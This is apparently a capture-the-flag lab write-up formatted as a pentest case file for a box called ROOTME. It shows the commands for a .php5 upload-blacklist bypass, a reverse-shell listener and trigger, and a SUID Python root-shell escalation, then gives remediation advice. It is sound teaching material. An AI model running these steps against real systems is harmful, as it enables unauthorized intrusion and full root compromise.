Case file

PHP upload bypass and SUID Python privilege escalation

Foundations Linux engagement: /panel rejected .php but accepted .php5 for a reverse shell as www-data; SUID /usr/bin/python spawned a root shell via GTFOBins.

Foundations22 minLinux · Web · File Upload · Privilege Escalation
  • Directory brute force found an upload panel with a weak extension blacklist. A .php5 reverse shell landed as www-data; SUID Python completed root.

  • nmap and dirsearch found /panel/. Renaming the reverse shell to .php5 bypassed the blacklist.

  • SUID /usr/bin/python with -p shell spawn completed privilege escalation.

01

Engagement summary

Directory brute force found an upload panel with a weak extension blacklist. A .php5 reverse shell landed as www-data; SUID Python completed root.

ROOTME (10.10.15.83) exposed OpenSSH and Apache. dirsearch located /panel/ (upload) and /uploads/. The panel blocked .php but accepted .php5; we uploaded a pentestmonkey reverse shell renamed to shell.php5, triggered it from /uploads/, and caught www-data. find for SUID binaries returned /usr/bin/python; python -c with os.execl('/bin/sh','sh','-p') yielded a root shell.

Business impact

Extension blacklists are not a security control — content-type and execution isolation are. SUID interpreters are root by design. Serve uploads from a non-executable store, allowlist extensions, and remove SUID from Python.

02

Upload panel and .php5 bypass

nmap and dirsearch found /panel/. Renaming the reverse shell to .php5 bypassed the blacklist.

OPERATOR · RECON

savvy@lab:~$ nmap 10.10.15.83 -sV -sC

22/tcp open ssh OpenSSH 7.6p1 Ubuntu

80/tcp open http Apache httpd 2.4.29

savvy@lab:~$ dirsearch -u http://10.10.15.83

/panel/ /uploads/

OPERATOR · UPLOAD RCE

savvy@lab:~$ cp php-reverse-shell.php shell.php5

# upload shell.php5 via http://10.10.15.83/panel/

savvy@lab:~$ nc -lnvp 1234

savvy@lab:~$ curl http://10.10.15.83/uploads/shell.php5

savvy@lab:/var/www$

savvy@lab:~$ id

uid=33(www-data) gid=33(www-data)

03

SUID Python to root

SUID /usr/bin/python with -p shell spawn completed privilege escalation.

OPERATOR · SUID

savvy@lab:~$ find / -user root -perm /4000 2>/dev/null

/usr/bin/python

savvy@lab:~$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Allowlist upload extensions and store files outside the web root without execute. Audit SUID binaries regularly; never leave interpreters setuid.